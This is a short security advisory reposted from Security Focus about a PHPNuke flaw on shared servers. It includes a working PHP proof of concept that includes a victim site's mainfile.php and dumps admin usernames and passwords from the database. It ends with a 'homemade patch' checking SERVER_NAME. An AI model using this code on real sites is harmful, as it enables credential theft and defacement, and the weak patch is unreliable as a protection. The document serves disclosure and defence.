NukeCops - Possible bug in PHPNuke and other CMS

Source: SECURITY FOCUS

There is a vulnerability in PHPNuke that permits execution of arbitrary
SQL queries on a database located in the same server of an attacker's
account.
This is the procedure: first of all attacker must create a
symlink pointing to victim's db directory in PHPNuke home directory
because of mainfile.php include method.
After that he can build a simple
php code executing a query to the PHPNuke database.

Here is an example:

---------------------[CODE]-------------------

require_once ("/location_of_victim's_PHPNuke/mainfile.php");

$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");

while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid]
Password: $record[pwd]

";

unset($sql);

?>

-------------------------[/CODE]-----------------

Queries are executed normally because config.php (which is included by
mainfile.php) provides the information in order to connect to the chosen
database. This is a very easy way to deface PHPNuke-based websites or
adding and removing users, and so on.

This "homemade patch" goes in config.php, just below connection
variables. It checks domain name provided by web server with the one
provided by the user and grants execution of SQL queries only if domain
names match. Here is the code:

---------------------------[CODE]--------------------

$domainname = "www.example.com";

if ($_SERVER['SERVER_NAME'] != $domainname ) {

~ echo "Access denied";

~ die();

}

---------------------------[/CODE]--------------------